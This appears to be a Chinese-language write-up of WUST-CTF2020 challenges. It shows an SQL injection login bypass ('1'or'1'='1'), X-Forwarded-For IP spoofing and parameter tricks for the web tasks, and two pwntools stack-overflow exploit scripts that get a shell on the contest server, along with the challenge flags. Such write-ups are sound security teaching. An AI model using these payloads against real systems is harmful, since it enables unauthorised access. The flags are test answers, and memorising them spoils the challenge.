WUST-CTF2020
Web
check in
修改maxlength,删除按钮的disabled,输入作者名52HeRtz即可登录
收到窗口信息一个博客地址,进入。
Ctrl+U查看源码,在末尾发现一半flag
继续找在“远古的博客”中找到另一半
wctf2020{can_y0u_can_a_can_a5_a_c@nner_can_Can_@_can}
admin(不会web勉强做出)
用户名:
admin
JSP万能密码:
1'or'1'='1
登录后页面提示,必须本地ip才能访问,想到用抓包添加XFF来伪造IP
Action->Send to Repeater->Go
页面提示用GET传参,停止抓包,在原网址末尾添加
?ais=520
抓包,重复上面的操作,得到新提示,用POST传参
与GET类似,用hackbar POST
wust=1314
后得到提示离flag很近了,得到一串字符
4dz aste.ubuntu.com/p/ https://p Rqr cSf2
将字符串HTML解码
将网址拼接起来得:
https://paste.ubuntu.com/p/cSf24dzRqr
进入得
d2N0ZjIwMjB7bjB3X3lvdV9rbjB3X3RoZV9iYXNpY18wZl9zcWxfYW5kX2h0dHB9
base64解码得:
wctf2020{n0w_you_kn0w_the_basic_0f_sql_and_http}
PWN
getshell
没什么好说的,真·签到题
from pwn import*
#r=process('./getshell')
r=remote('47.97.40.187',12333)
sys_addr=0x0804851b
payload='a'*0x18+'a'*4+p32(sys_addr)
r.sendline(payload)
r.interactive()
wctf2020{E@sy_get_shel1}
getshell2
没有buf段让我们写入"/bin/sh",也没有现成的"/bin/sh"让我们使用,但是需要知道的是只需要"sh"便能getshell
注意到这里的read允许的最大长度为36,buf可容纳的长度为0x18=24,所以实现栈溢出覆盖返回地址的长度为28,所以只有8个字节能让我们写syscall
如果我们调用plt表的system函数地址,是需要继续压入一个system返回地址的,这两个地址的长度已经达到了8个字节,没有位置来输入"sh"的地址,所以想到程序里是否有call system直接让我们调用,这样就不用压入返回地址,就能省4个字节来压入"sh"的地址
在shell函数的汇编代码里找到了,所以将栈溢出后的返回地址直接改为0x08048529就行了,现在找"sh"的地址,用ROPgadget
exp:
from pwn import*
#r = process('./getshell-2')
r = remote('47.97.40.187', 12334)
sh_addr = 0x08048670
sys_addr = 0x08048529
payload = flat(['a'*28, sys_addr, sh_addr])
r.sendline(payload)
r.interactive()